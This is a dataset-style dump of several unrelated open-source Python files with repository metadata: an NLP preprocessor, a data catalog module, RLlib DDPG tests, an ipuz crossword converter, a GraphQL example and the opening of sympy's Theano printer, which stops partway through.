| 0.651919
|
3c767a44f7806c81df1529b122181a6d19fafeaf
| 1,612
|
py
|
Python
|
sgnlp/models/csgec/preprocess.py
|
raymondng76/sgnlp
|
f09eada90ef5b1ee979901e5c14413d32e758049
|
[
"MIT"
] | 14
|
2021-08-02T01:52:18.000Z
|
2022-01-14T10:16:02.000Z
|
sgnlp/models/csgec/preprocess.py
|
raymondng76/sgnlp
|
f09eada90ef5b1ee979901e5c14413d32e758049
|
[
"MIT"
] | 29
|
2021-08-02T01:53:46.000Z
|
2022-03-30T05:40:46.000Z
|
sgnlp/models/csgec/preprocess.py
|
raymondng76/sgnlp
|
f09eada90ef5b1ee979901e5c14413d32e758049
|
[
"MIT"
] | 7
|
2021-08-02T01:54:19.000Z
|
2022-01-07T06:37:45.000Z
|
import re
import torch
from typing import List
from nltk import word_tokenize, sent_tokenize
def prepare_sentences(text):
# tokenize paragraph into sentences
original_sentences = sent_tokenize(text)
original_sentences = list(
map(lambda x: " ".join(word_tokenize(x)), original_sentences)
)
output = []
ctx = []
for idx, src in enumerate(original_sentences):
if idx == 0:
output += [[src, [src]]]
else:
output += [[src, ctx]]
if len(ctx) == 2:
ctx = ctx[1:]
ctx += [src]
output = list(map(lambda x: [x[0], " ".join(x[1])], output))
original_sentences = list(
map(
lambda sent: re.sub(r'\s([?.!,"](?:\s|$))', r"\1", sent), original_sentences
)
)
return original_sentences, output
class CsgecPreprocessor:
def __init__(self, src_tokenizer, ctx_tokenizer):
self.src_tokenizer = src_tokenizer
self.ctx_tokenizer = ctx_tokenizer
def __call__(self, texts: List[str]):
batch_src_ids = []
batch_ctx_ids = []
for text in texts:
src_ids = []
ctx_ids = []
original_sentences, prepared_inputs = prepare_sentences(text)
for src_text, ctx_text in prepared_inputs:
src_ids.append(torch.LongTensor(self.src_tokenizer(src_text).input_ids))
ctx_ids.append(torch.LongTensor(self.ctx_tokenizer(ctx_text).input_ids))
batch_src_ids.append(src_ids)
batch_ctx_ids.append(ctx_ids)
return batch_src_ids, batch_ctx_ids
| 27.793103
| 88
| 0.602978
|
31b6f670e1ce2d00db64c253572e9ea2b7c81da0
| 6,246
|
py
|
Python
|
src/data_source/catalog.py
|
ravwojdyla/public-data-source
|
54a693e18419b57cb50c3c3e8a78930ac472ac47
|
[
"Apache-2.0"
] | null | null | null |
src/data_source/catalog.py
|
ravwojdyla/public-data-source
|
54a693e18419b57cb50c3c3e8a78930ac472ac47
|
[
"Apache-2.0"
] | null | null | null |
src/data_source/catalog.py
|
ravwojdyla/public-data-source
|
54a693e18419b57cb50c3c3e8a78930ac472ac47
|
[
"Apache-2.0"
] | null | null | null |
from datetime import datetime, date
from typing import Optional, Union, Sequence
from pathlib import Path
import functools
import yaml
import fsspec
import os
from . import ENV_CATALOG_PATH
from .core import Entry, Catalog, Storage, DEFAULT_STORAGE
import logging
logger = logging.getLogger(__name__)
PathType = Union[str, Path]
def default_urlpath() -> str:
urlpath = os.getenv(ENV_CATALOG_PATH)
if not urlpath:
raise ValueError(
"Catalog must be provided explicitly or "
f'set using environment variable "{ENV_CATALOG_PATH}"'
)
return urlpath
def _check_urlpath(urlpath: Optional[PathType] = None) -> str:
if urlpath:
return str(urlpath)
return default_urlpath()
def merge(catalogs: Sequence[Catalog]) -> Catalog:
return functools.reduce(lambda x, y: x.merge(y), catalogs)
def empty() -> Catalog:
"""Create empty `Catalog` instance"""
return Catalog(entries=[])
def load(urlpath: Optional[PathType] = None) -> Catalog:
"""Load catalog from url or path
Parameters
----------
urlpath : Union[str, Path]
Path/URL for catalog, defaults to environment
variable 'CATALOG_PATH'
"""
urlpath = _check_urlpath(urlpath)
of = fsspec.open(urlpath, mode="r")
if not of.fs.exists(urlpath):
return empty()
with of.open() as f:
obj = yaml.load(f, Loader=yaml.FullLoader)
return Catalog(**obj)
def add_entry(entry: Entry, urlpath: Optional[PathType] = None, overwrite=False):
"""Add an entry to a pre-existing catalog
The convience function will load the catalog, add the entry, and
save the catalog to the same location.
Parameters
----------
entry : Entry
New entry to add
urlpath : PathType, optional
Path/URL for catalog, defaults to environment
variable 'CATALOG_PATH'
overwrite : bool, optional
Overwrite the entry in the catalog if it exists, by default False
Raises
------
KeyError
If `overwrite=False` and the entry already exists
"""
cat = load(urlpath=urlpath)
if overwrite and entry in cat:
cat.remove(entry)
cat.add(entry)
save(cat, urlpath)
def save(catalog: Catalog, urlpath: Optional[PathType] = None):
"""Save catalog to url or path
Parameters
----------
catalog : Catalog
Catalog to save
urlpath : PathType, optional
Path/URL for catalog, defaults to environment
variable 'CATALOG_PATH'
"""
urlpath = _check_urlpath(urlpath)
logger.info('Saving catalog to path "%s"', urlpath)
of = fsspec.open(urlpath, mode="w")
with of.open() as f:
yaml.dump(catalog.dict(), f)
def create_entry(
source: Union[str, dict],
slug: str,
version: str,
format: str,
type: str,
name: Optional[str] = None,
created: Optional[datetime] = None,
metadata: Optional[dict] = None,
properties: Optional[dict] = None,
storage: Storage = DEFAULT_STORAGE,
):
"""Create new catalog entry
This is a convenience over creating `core.*` objects directly.
Parameters
----------
source: Union[str, dict]
Slug for data source (e.g. 'clinvar', 'otp', 'gnomad') or dict for
`Source` instance (e.g. dict(name='gnomAD v3', slug='gnomad_v3'))
slug: str
Slug for data artifact
version: str
Version string (must start with 'v')
format: str
Name of artifact serialization format (e.g. 'parquet', 'csv')
type: str
Type of artifact serialization (e.g. 'file', 'directory', 'archive')
name: Optional[str]
Name of artifact (e.g. 'ClinVar Association Submission Summary' as
compared to slug 'submission_summary')
created: Optional[datetime]
Time at which the data artifact was created. There are three ways in
which this is most likely to be set:
1. For sources with semantic versions and no time based releases,
this should be a static timestamp approximately equal to the time
at which the corresponding semantic release, indicated by `version`,
was published.
2. For sources with no semantic versioning and time-based releases,
this should correspond to time-based release from the source (e.g.
ClinVar has monthly releases so this timestamp should be truncated
to a month).
3. For sources that continually update (typically those from APIs),
this should be equal to the time at which data was collected. In
other words, the timestamp is not specific to the source but to
the collection process.
If not provided, defaults to timestamp for midnight of current day.
metadata: Optional[dict]
Artifact metadata commonly used to store schema strings or other
informative but unstructured information
properties: Optional[dict]
Format properties such as compression, delimiters, partitions, etc.
storage: Storage
Destination for artifact data
Examples
--------
>> create_entry(
source='clinvar',
slug='submission_summary',
version='v2020-06',
created=datetime.now(),
format='parquet',
type='file'
)
Entry(
source=Source(slug='clinvar', name=None, description=None),
artifact=Artifact(
slug='submission_summary', version='v2020-06',
created=datetime.datetime(2020, 6, 10, 12, 12, 13, 859561),
formats=[Format(name=<FormatName.parquet: 'parquet'>, type=<FormatType.file: 'file'>, properties=None)],
name=None, metadata=None),
storage=Storage(slug='gcs', scheme='gs')
)
"""
if created is None:
created = datetime.combine(date.today(), datetime.min.time())
return Entry(
**dict(
source=dict(slug=source) if isinstance(source, str) else source,
artifact=dict(
slug=slug,
version=version,
created=created,
metadata=metadata,
formats=[dict(name=format, type=type, properties=properties)],
),
storage=storage,
)
)
| 31.386935
| 116
| 0.638168
|
a66949b9bff5ffef667a1f80e3752dc14c83cf3a
| 21,950
|
py
|
Python
|
rllib/agents/ddpg/tests/test_ddpg.py
|
zommiommy/ray
|
aa1cbe8abc845e1a6acf2f237b4b00aa7c3f295d
|
[
"Apache-2.0"
] | null | null | null |
rllib/agents/ddpg/tests/test_ddpg.py
|
zommiommy/ray
|
aa1cbe8abc845e1a6acf2f237b4b00aa7c3f295d
|
[
"Apache-2.0"
] | null | null | null |
rllib/agents/ddpg/tests/test_ddpg.py
|
zommiommy/ray
|
aa1cbe8abc845e1a6acf2f237b4b00aa7c3f295d
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import re
import unittest
import ray.rllib.agents.ddpg as ddpg
from ray.rllib.agents.ddpg.ddpg_torch_policy import ddpg_actor_critic_loss as \
loss_torch
from ray.rllib.agents.sac.tests.test_sac import SimpleEnv
from ray.rllib.execution.replay_buffer import LocalReplayBuffer
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils.framework import try_import_tf, try_import_torch
from ray.rllib.utils.numpy import fc, huber_loss, l2_loss, relu, sigmoid
from ray.rllib.utils.test_utils import check, framework_iterator, \
check_compute_action
from ray.rllib.utils.torch_ops import convert_to_torch_tensor
tf = try_import_tf()
torch, _ = try_import_torch()
class TestDDPG(unittest.TestCase):
def test_ddpg_compilation(self):
"""Test whether a DDPGTrainer can be built with both frameworks."""
config = ddpg.DEFAULT_CONFIG.copy()
config["num_workers"] = 0 # Run locally.
config["num_envs_per_worker"] = 2 # Run locally.
num_iterations = 2
# Test against all frameworks.
for _ in framework_iterator(config, ("tf", "torch")):
trainer = ddpg.DDPGTrainer(config=config, env="Pendulum-v0")
for i in range(num_iterations):
results = trainer.train()
print(results)
check_compute_action(trainer)
def test_ddpg_exploration_and_with_random_prerun(self):
"""Tests DDPG's Exploration (w/ random actions for n timesteps)."""
core_config = ddpg.DEFAULT_CONFIG.copy()
core_config["num_workers"] = 0 # Run locally.
obs = np.array([0.0, 0.1, -0.1])
# Test against all frameworks.
for _ in framework_iterator(core_config, ("torch", "tf")):
config = core_config.copy()
# Default OUNoise setup.
trainer = ddpg.DDPGTrainer(config=config, env="Pendulum-v0")
# Setting explore=False should always return the same action.
a_ = trainer.compute_action(obs, explore=False)
for _ in range(50):
a = trainer.compute_action(obs, explore=False)
check(a, a_)
# explore=None (default: explore) should return different actions.
actions = []
for _ in range(50):
actions.append(trainer.compute_action(obs))
check(np.std(actions), 0.0, false=True)
# Check randomness at beginning.
config["exploration_config"] = {
# Act randomly at beginning ...
"random_timesteps": 50,
# Then act very closely to deterministic actions thereafter.
"ou_base_scale": 0.001,
"initial_scale": 0.001,
"final_scale": 0.001,
}
trainer = ddpg.DDPGTrainer(config=config, env="Pendulum-v0")
# ts=1 (get a deterministic action as per explore=False).
deterministic_action = trainer.compute_action(obs, explore=False)
# ts=2-5 (in random window).
random_a = []
for _ in range(49):
random_a.append(trainer.compute_action(obs, explore=True))
check(random_a[-1], deterministic_action, false=True)
self.assertTrue(np.std(random_a) > 0.5)
# ts > 50 (a=deterministic_action + scale * N[0,1])
for _ in range(50):
a = trainer.compute_action(obs, explore=True)
check(a, deterministic_action, rtol=0.1)
# ts >> 50 (BUT: explore=False -> expect deterministic action).
for _ in range(50):
a = trainer.compute_action(obs, explore=False)
check(a, deterministic_action)
def test_ddpg_loss_function(self):
"""Tests DDPG loss function results across all frameworks."""
config = ddpg.DEFAULT_CONFIG.copy()
# Run locally.
config["num_workers"] = 0
config["learning_starts"] = 0
config["twin_q"] = True
config["use_huber"] = True
config["huber_threshold"] = 1.0
config["gamma"] = 0.99
# Make this small (seems to introduce errors).
config["l2_reg"] = 1e-10
config["prioritized_replay"] = False
# Use very simple nets.
config["actor_hiddens"] = [10]
config["critic_hiddens"] = [10]
# Make sure, timing differences do not affect trainer.train().
config["min_iter_time_s"] = 0
config["timesteps_per_iteration"] = 100
map_ = {
# Normal net.
"default_policy/actor_hidden_0/kernel": "policy_model.action_0."
"_model.0.weight",
"default_policy/actor_hidden_0/bias": "policy_model.action_0."
"_model.0.bias",
"default_policy/actor_out/kernel": "policy_model.action_out."
"_model.0.weight",
"default_policy/actor_out/bias": "policy_model.action_out."
"_model.0.bias",
"default_policy/sequential/q_hidden_0/kernel": "q_model.q_hidden_0"
"._model.0.weight",
"default_policy/sequential/q_hidden_0/bias": "q_model.q_hidden_0."
"_model.0.bias",
"default_policy/sequential/q_out/kernel": "q_model.q_out._model."
"0.weight",
"default_policy/sequential/q_out/bias": "q_model.q_out._model."
"0.bias",
# -- twin.
"default_policy/sequential_1/twin_q_hidden_0/kernel": "twin_"
"q_model.twin_q_hidden_0._model.0.weight",
"default_policy/sequential_1/twin_q_hidden_0/bias": "twin_"
"q_model.twin_q_hidden_0._model.0.bias",
"default_policy/sequential_1/twin_q_out/kernel": "twin_"
"q_model.twin_q_out._model.0.weight",
"default_policy/sequential_1/twin_q_out/bias": "twin_"
"q_model.twin_q_out._model.0.bias",
# Target net.
"default_policy/actor_hidden_0_1/kernel": "policy_model.action_0."
"_model.0.weight",
"default_policy/actor_hidden_0_1/bias": "policy_model.action_0."
"_model.0.bias",
"default_policy/actor_out_1/kernel": "policy_model.action_out."
"_model.0.weight",
"default_policy/actor_out_1/bias": "policy_model.action_out._model"
".0.bias",
"default_policy/sequential_2/q_hidden_0/kernel": "q_model."
"q_hidden_0._model.0.weight",
"default_policy/sequential_2/q_hidden_0/bias": "q_model."
"q_hidden_0._model.0.bias",
"default_policy/sequential_2/q_out/kernel": "q_model."
"q_out._model.0.weight",
"default_policy/sequential_2/q_out/bias": "q_model."
"q_out._model.0.bias",
# -- twin.
"default_policy/sequential_3/twin_q_hidden_0/kernel": "twin_"
"q_model.twin_q_hidden_0._model.0.weight",
"default_policy/sequential_3/twin_q_hidden_0/bias": "twin_"
"q_model.twin_q_hidden_0._model.0.bias",
"default_policy/sequential_3/twin_q_out/kernel": "twin_"
"q_model.twin_q_out._model.0.weight",
"default_policy/sequential_3/twin_q_out/bias": "twin_"
"q_model.twin_q_out._model.0.bias",
}
env = SimpleEnv
batch_size = 100
if env is SimpleEnv:
obs_size = (batch_size, 1)
actions = np.random.random(size=(batch_size, 1))
elif env == "CartPole-v0":
obs_size = (batch_size, 4)
actions = np.random.randint(0, 2, size=(batch_size, ))
else:
obs_size = (batch_size, 3)
actions = np.random.random(size=(batch_size, 1))
# Batch of size=n.
input_ = self._get_batch_helper(obs_size, actions, batch_size)
# Simply compare loss values AND grads of all frameworks with each
# other.
prev_fw_loss = weights_dict = None
expect_c, expect_a, expect_t = None, None, None
# History of tf-updated NN-weights over n training steps.
tf_updated_weights = []
# History of input batches used.
tf_inputs = []
for fw, sess in framework_iterator(
config, frameworks=("tf", "torch"), session=True):
# Generate Trainer and get its default Policy object.
trainer = ddpg.DDPGTrainer(config=config, env=env)
policy = trainer.get_policy()
p_sess = None
if sess:
p_sess = policy.get_session()
# Set all weights (of all nets) to fixed values.
if weights_dict is None:
assert fw == "tf" # Start with the tf vars-dict.
weights_dict = policy.get_weights()
else:
assert fw == "torch" # Then transfer that to torch Model.
model_dict = self._translate_weights_to_torch(
weights_dict, map_)
policy.model.load_state_dict(model_dict)
policy.target_model.load_state_dict(model_dict)
if fw == "torch":
# Actually convert to torch tensors.
input_ = policy._lazy_tensor_dict(input_)
input_ = {k: input_[k] for k in input_.keys()}
# Only run the expectation once, should be the same anyways
# for all frameworks.
if expect_c is None:
expect_c, expect_a, expect_t = \
self._ddpg_loss_helper(
input_, weights_dict, sorted(weights_dict.keys()), fw,
gamma=config["gamma"],
huber_threshold=config["huber_threshold"],
l2_reg=config["l2_reg"],
sess=sess)
# Get actual outs and compare to expectation AND previous
# framework. c=critic, a=actor, e=entropy, t=td-error.
if fw == "tf":
c, a, t, tf_c_grads, tf_a_grads = \
p_sess.run([
policy.critic_loss,
policy.actor_loss,
policy.td_error,
policy._critic_optimizer.compute_gradients(
policy.critic_loss,
policy.model.q_variables()),
policy._actor_optimizer.compute_gradients(
policy.actor_loss,
policy.model.policy_variables())],
feed_dict=policy._get_loss_inputs_dict(
input_, shuffle=False))
# Check pure loss values.
check(c, expect_c)
check(a, expect_a)
check(t, expect_t)
tf_c_grads = [g for g, v in tf_c_grads]
tf_a_grads = [g for g, v in tf_a_grads]
elif fw == "torch":
loss_torch(policy, policy.model, None, input_)
c, a, t = policy.critic_loss, policy.actor_loss, \
policy.td_error
# Check pure loss values.
check(c, expect_c)
check(a, expect_a)
check(t, expect_t)
# Test actor gradients.
policy._actor_optimizer.zero_grad()
assert all(v.grad is None for v in policy.model.q_variables())
assert all(
v.grad is None for v in policy.model.policy_variables())
a.backward()
# `actor_loss` depends on Q-net vars
# (but not twin-Q-net vars!).
assert not any(v.grad is None
for v in policy.model.q_variables()[:4])
assert all(
v.grad is None for v in policy.model.q_variables()[4:])
assert not all(
torch.mean(v.grad) == 0
for v in policy.model.policy_variables())
assert not all(
torch.min(v.grad) == 0
for v in policy.model.policy_variables())
# Compare with tf ones.
torch_a_grads = [
v.grad for v in policy.model.policy_variables()
]
for tf_g, torch_g in zip(tf_a_grads, torch_a_grads):
if tf_g.shape != torch_g.shape:
check(tf_g, np.transpose(torch_g))
else:
check(tf_g, torch_g)
# Test critic gradients.
policy._critic_optimizer.zero_grad()
assert all(
v.grad is None or torch.mean(v.grad) == 0.0
for v in policy.model.q_variables())
assert all(
v.grad is None or torch.min(v.grad) == 0.0
for v in policy.model.q_variables())
c.backward()
assert not all(
torch.mean(v.grad) == 0
for v in policy.model.q_variables())
assert not all(
torch.min(v.grad) == 0 for v in policy.model.q_variables())
# Compare with tf ones.
torch_c_grads = [v.grad for v in policy.model.q_variables()]
for tf_g, torch_g in zip(tf_c_grads, torch_c_grads):
if tf_g.shape != torch_g.shape:
check(tf_g, np.transpose(torch_g))
else:
check(tf_g, torch_g)
# Compare (unchanged(!) actor grads) with tf ones.
torch_a_grads = [
v.grad for v in policy.model.policy_variables()
]
for tf_g, torch_g in zip(tf_a_grads, torch_a_grads):
if tf_g.shape != torch_g.shape:
check(tf_g, np.transpose(torch_g))
else:
check(tf_g, torch_g)
# Store this framework's losses in prev_fw_loss to compare with
# next framework's outputs.
if prev_fw_loss is not None:
check(c, prev_fw_loss[0])
check(a, prev_fw_loss[1])
check(t, prev_fw_loss[2])
prev_fw_loss = (c, a, t)
# Update weights from our batch (n times).
for update_iteration in range(10):
print("train iteration {}".format(update_iteration))
if fw == "tf":
in_ = self._get_batch_helper(obs_size, actions, batch_size)
tf_inputs.append(in_)
# Set a fake-batch to use
# (instead of sampling from replay buffer).
buf = LocalReplayBuffer.get_instance_for_testing()
buf._fake_batch = in_
trainer.train()
updated_weights = policy.get_weights()
# Net must have changed.
if tf_updated_weights:
check(
updated_weights[
"default_policy/actor_hidden_0/kernel"],
tf_updated_weights[-1][
"default_policy/actor_hidden_0/kernel"],
false=True)
tf_updated_weights.append(updated_weights)
# Compare with updated tf-weights. Must all be the same.
else:
tf_weights = tf_updated_weights[update_iteration]
in_ = tf_inputs[update_iteration]
# Set a fake-batch to use
# (instead of sampling from replay buffer).
buf = LocalReplayBuffer.get_instance_for_testing()
buf._fake_batch = in_
trainer.train()
# Compare updated model and target weights.
for tf_key in tf_weights.keys():
tf_var = tf_weights[tf_key]
# Model.
if re.search(
"actor_out_1|actor_hidden_0_1|sequential_"
"[23]", tf_key):
torch_var = policy.target_model.state_dict()[map_[
tf_key]]
# Target model.
else:
torch_var = policy.model.state_dict()[map_[tf_key]]
if tf_var.shape != torch_var.shape:
check(tf_var, np.transpose(torch_var), rtol=0.07)
else:
check(tf_var, torch_var, rtol=0.07)
trainer.stop()
def _get_batch_helper(self, obs_size, actions, batch_size):
return {
SampleBatch.CUR_OBS: np.random.random(size=obs_size),
SampleBatch.ACTIONS: actions,
SampleBatch.REWARDS: np.random.random(size=(batch_size, )),
SampleBatch.DONES: np.random.choice(
[True, False], size=(batch_size, )),
SampleBatch.NEXT_OBS: np.random.random(size=obs_size),
"weights": np.ones(shape=(batch_size, )),
}
def _ddpg_loss_helper(self, train_batch, weights, ks, fw, gamma,
huber_threshold, l2_reg, sess):
"""Emulates DDPG loss functions for tf and torch."""
model_out_t = train_batch[SampleBatch.CUR_OBS]
target_model_out_tp1 = train_batch[SampleBatch.NEXT_OBS]
# get_policy_output
policy_t = sigmoid(2.0 * fc(
relu(
fc(model_out_t, weights[ks[1]], weights[ks[0]], framework=fw)),
weights[ks[5]], weights[ks[4]]))
# Get policy output for t+1 (target model).
policy_tp1 = sigmoid(2.0 * fc(
relu(
fc(target_model_out_tp1,
weights[ks[3]],
weights[ks[2]],
framework=fw)), weights[ks[7]], weights[ks[6]]))
# Assume no smooth target policy.
policy_tp1_smoothed = policy_tp1
# Q-values for the actually selected actions.
# get_q_values
q_t = fc(
relu(
fc(np.concatenate(
[model_out_t, train_batch[SampleBatch.ACTIONS]], -1),
weights[ks[9]],
weights[ks[8]],
framework=fw)),
weights[ks[11]],
weights[ks[10]],
framework=fw)
twin_q_t = fc(
relu(
fc(np.concatenate(
[model_out_t, train_batch[SampleBatch.ACTIONS]], -1),
weights[ks[13]],
weights[ks[12]],
framework=fw)),
weights[ks[15]],
weights[ks[14]],
framework=fw)
# Q-values for current policy in given current state.
# get_q_values
q_t_det_policy = fc(
relu(
fc(np.concatenate([model_out_t, policy_t], -1),
weights[ks[9]],
weights[ks[8]],
framework=fw)),
weights[ks[11]],
weights[ks[10]],
framework=fw)
# Target q network evaluation.
# target_model.get_q_values
q_tp1 = fc(
relu(
fc(np.concatenate([target_model_out_tp1, policy_tp1_smoothed],
-1),
weights[ks[17]],
weights[ks[16]],
framework=fw)),
weights[ks[19]],
weights[ks[18]],
framework=fw)
twin_q_tp1 = fc(
relu(
fc(np.concatenate([target_model_out_tp1, policy_tp1_smoothed],
-1),
weights[ks[21]],
weights[ks[20]],
framework=fw)),
weights[ks[23]],
weights[ks[22]],
framework=fw)
q_t_selected = np.squeeze(q_t, axis=-1)
twin_q_t_selected = np.squeeze(twin_q_t, axis=-1)
q_tp1 = np.minimum(q_tp1, twin_q_tp1)
q_tp1_best = np.squeeze(q_tp1, axis=-1)
dones = train_batch[SampleBatch.DONES]
rewards = train_batch[SampleBatch.REWARDS]
if fw == "torch":
dones = dones.float().numpy()
rewards = rewards.numpy()
q_tp1_best_masked = (1.0 - dones) * q_tp1_best
q_t_selected_target = rewards + gamma * q_tp1_best_masked
td_error = q_t_selected - q_t_selected_target
twin_td_error = twin_q_t_selected - q_t_selected_target
td_error = td_error + twin_td_error
errors = huber_loss(td_error, huber_threshold) + \
huber_loss(twin_td_error, huber_threshold)
critic_loss = np.mean(errors)
actor_loss = -np.mean(q_t_det_policy)
# Add l2-regularization if required.
for name, var in weights.items():
if re.match("default_policy/actor_(hidden_0|out)/kernel", name):
actor_loss += (l2_reg * l2_loss(var))
elif re.match("default_policy/sequential(_1)?/\\w+/kernel", name):
critic_loss += (l2_reg * l2_loss(var))
return critic_loss, actor_loss, td_error
def _translate_weights_to_torch(self, weights_dict, map_):
model_dict = {
map_[k]: convert_to_torch_tensor(
np.transpose(v) if re.search("kernel", k) else v)
for k, v in weights_dict.items() if re.search(
"default_policy/(actor_(hidden_0|out)|sequential(_1)?)/", k)
}
return model_dict
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", __file__]))
| 43.208661
| 79
| 0.536538
|
d177fb449b3b4b4da37cd92b73d61e3a186fd129
| 3,875
|
py
|
Python
|
crossword/format_ipuz.py
|
jmviz/xd
|
f905e5c61b2835073b19cc3fa0d6917432fa7ece
|
[
"MIT"
] | 179
|
2016-03-05T03:14:56.000Z
|
2022-02-12T22:48:55.000Z
|
crossword/format_ipuz.py
|
jmviz/xd
|
f905e5c61b2835073b19cc3fa0d6917432fa7ece
|
[
"MIT"
] | 24
|
2016-02-14T07:43:42.000Z
|
2021-12-14T01:09:54.000Z
|
crossword/format_ipuz.py
|
jmviz/xd
|
f905e5c61b2835073b19cc3fa0d6917432fa7ece
|
[
"MIT"
] | 25
|
2016-02-19T20:35:03.000Z
|
2022-01-31T09:15:44.000Z
|
# -*- coding: utf-8 -*-
from crossword.core import Crossword, CrosswordCell
from crossword.exceptions import CrosswordException
def from_ipuz(ipuz_dict):
for kind in ipuz_dict['kind']:
if not kind.startswith("http://ipuz.org/crossword"):
raise CrosswordException
known_keys = (
"dimensions",
"editor",
"author",
"date",
"notes",
"uniqueid",
"publisher",
"copyright",
"title",
"block",
"empty",
"clues",
"puzzle",
"solution",
)
crossword = Crossword(
ipuz_dict['dimensions']['width'],
ipuz_dict['dimensions']['height']
)
crossword._format_identifier = Crossword.IPUZ
crossword.meta.contributor = ipuz_dict.get('editor')
crossword.meta.creator = ipuz_dict.get('author')
crossword.meta.date = ipuz_dict.get('date')
crossword.meta.description = ipuz_dict.get('notes')
crossword.meta.identifier = ipuz_dict.get('uniqueid')
crossword.meta.publisher = ipuz_dict.get('publisher')
crossword.meta.rights = ipuz_dict.get('copyright')
crossword.meta.title = ipuz_dict.get('title')
crossword.block = ipuz_dict.get('block')
crossword.empty = ipuz_dict.get('empty')
for number, clue in ipuz_dict.get('clues', {}).get('Across', []):
crossword.clues.across[number] = clue
for number, clue in ipuz_dict.get('clues', {}).get('Down', []):
crossword.clues.down[number] = clue
for x, y in crossword.cells:
crossword[x, y] = CrosswordCell()
for key in ('puzzle', 'solution'):
entry = ipuz_dict.get(key)
for x, y in crossword.cells:
try:
crossword[x, y][key] = entry[y][x]
except (IndexError, TypeError):
crossword[x, y][key] = None
for key, value in ipuz_dict.items():
if key not in known_keys:
crossword._format[key] = value
return crossword
def to_ipuz(crossword):
ipuz_dict = {
"version": "http://ipuz.org/v1",
"dimensions": {
"width": crossword.width,
"height": crossword.height,
},
"puzzle": [
[getattr(cell, "puzzle", None) for cell in row]
for row in crossword._data
],
"solution": [
[getattr(cell, "solution", None) for cell in row]
for row in crossword._data
],
}
if crossword.meta.creator is not None:
ipuz_dict["author"] = crossword.meta.creator
if crossword.meta.rights is not None:
ipuz_dict["copyright"] = crossword.meta.rights
if crossword.meta.date is not None:
ipuz_dict["date"] = crossword.meta.date
if crossword.meta.contributor is not None:
ipuz_dict["editor"] = crossword.meta.contributor
if crossword.meta.description is not None:
ipuz_dict["notes"] = crossword.meta.description
if crossword.meta.publisher is not None:
ipuz_dict["publisher"] = crossword.meta.publisher
if crossword.meta.identifier is not None:
ipuz_dict["uniqueid"] = crossword.meta.identifier
if crossword.meta.title is not None:
ipuz_dict["title"] = crossword.meta.title
if crossword.block is not None:
ipuz_dict["block"] = crossword.block
if crossword.empty is not None:
ipuz_dict["empty"] = crossword.empty
across_clues = [list(item) for item in crossword.clues.across()]
down_clues = [list(item) for item in crossword.clues.down()]
if across_clues or down_clues:
ipuz_dict["clues"] = {}
if across_clues:
ipuz_dict["clues"]['Across'] = across_clues
if down_clues:
ipuz_dict["clues"]['Down'] = down_clues
if crossword._format_identifier == Crossword.IPUZ:
ipuz_dict.update(crossword._format)
return ipuz_dict
| 33.695652
| 69
| 0.612903
|
5218b3b231321aff7264685bf8fbe70afad19eb4
| 1,198
|
py
|
Python
|
mutations/updateApp/example.py
|
plotly/dds-api-docs
|
61fe3f74d5546b45bd1c960473beac6097bba7a1
|
[
"MIT"
] | 6
|
2019-09-15T22:19:07.000Z
|
2021-01-27T20:23:03.000Z
|
mutations/updateApp/example.py
|
plotly/dds-api-docs
|
61fe3f74d5546b45bd1c960473beac6097bba7a1
|
[
"MIT"
] | 2
|
2019-04-04T01:26:40.000Z
|
2020-02-13T23:39:28.000Z
|
mutations/updateApp/example.py
|
plotly/dds-api-docs
|
61fe3f74d5546b45bd1c960473beac6097bba7a1
|
[
"MIT"
] | 2
|
2019-03-19T19:00:52.000Z
|
2020-02-09T11:53:01.000Z
|
from gql import gql
from dds import client as dds_client
update_app_mutation = gql(
"""
mutation {
updateApp(
metadata: {
title: "title",
description: "description",
tags: "tag1,tag2,tag3",
showInPortal: true,
permissionLevel: restricted,
contact: {
name: "contact-name",
email: "contact-email@test.com"
}
},
appname: "test-app"
) {
app {
name
metadata {
title
description
tags
showInPortal
permissionLevel
contact {
name
email
}
}
}
error
}
}
"""
)
result = dds_client.execute(update_app_mutation)["updateApp"]
print(f"updated app name: {result['app']['name']}")
print(
f"updated metadata contact email: {result['app']['metadata']['contact']['email']}"
)
print(f"error: {result['error']}")
| 24.958333
| 86
| 0.412354
|
94c381be2092a47f3e036773e9760e7fdea96a1e
| 17,626
|
py
|
Python
|
sympy/printing/theanocode.py
|
iamabhishek0/sympy
|
c461bd1ff9d178d1012b04fd0bf37ee3abb02cdd
|
[
"BSD-3-Clause"
] | 445
|
2019-01-26T13:50:26.000Z
|
2022-03-18T05:17:38.000Z
|
sympy/printing/theanocode.py
|
iamabhishek0/sympy
|
c461bd1ff9d178d1012b04fd0bf37ee3abb02cdd
|
[
"BSD-3-Clause"
] | 242
|
2019-01-29T15:48:27.000Z
|
2022-03-31T22:09:21.000Z
|
sympy/printing/theanocode.py
|
iamabhishek0/sympy
|
c461bd1ff9d178d1012b04fd0bf37ee3abb02cdd
|
[
"BSD-3-Clause"
] | 31
|
2019-03-10T09:51:27.000Z
|
2022-02-14T23:11:12.000Z
|
from __future__ import print_function, division
from sympy.core.compatibility import range, is_sequence
from sympy.external import import_module
from sympy.printing.printer import Printer
import sympy
from functools import partial
theano = import_module('theano')
if theano:
ts = theano.scalar
tt = theano.tensor
from theano.sandbox import linalg as tlinalg
mapping = {
sympy.Add: tt.add,
sympy.Mul: tt.mul,
sympy.Abs: tt.abs_,
sympy.sign: tt.sgn,
sympy.ceiling: tt.ceil,
sympy.floor: tt.floor,
sympy.log: tt.log,
sympy.exp: tt.exp,
sympy.sqrt: tt.sqrt,
sympy.cos: tt.cos,
sympy.acos: tt.arccos,
sympy.sin: tt.sin,
sympy.asin: tt.arcsin,
sympy.tan: tt.tan,
sympy.atan: tt.arctan,
sympy.atan2: tt.arctan2,
sympy.cosh: tt.cosh,
sympy.acosh: tt.arccosh,
sympy.sinh: tt.sinh,
sympy.asinh: tt.arcsinh,
sympy.tanh: tt.tanh,
sympy.atanh: tt.arctanh,
sympy.re: tt.real,
sympy.im: tt.imag,
sympy.arg: tt.angle,
sympy.erf: tt.erf,
sympy.gamma: tt.gamma,
sympy.loggamma: tt.gammaln,
sympy.Pow: tt.pow,
sympy.Eq: tt.eq,
sympy.StrictGreaterThan: tt.gt,
sympy.StrictLessThan: tt.lt,
sympy.LessThan: tt.le,
sympy.GreaterThan: tt.ge,
sympy.And: tt.and_,
sympy.Or: tt.or_,
sympy.Max: tt.maximum, # Sympy accept >2 inputs, Theano only 2
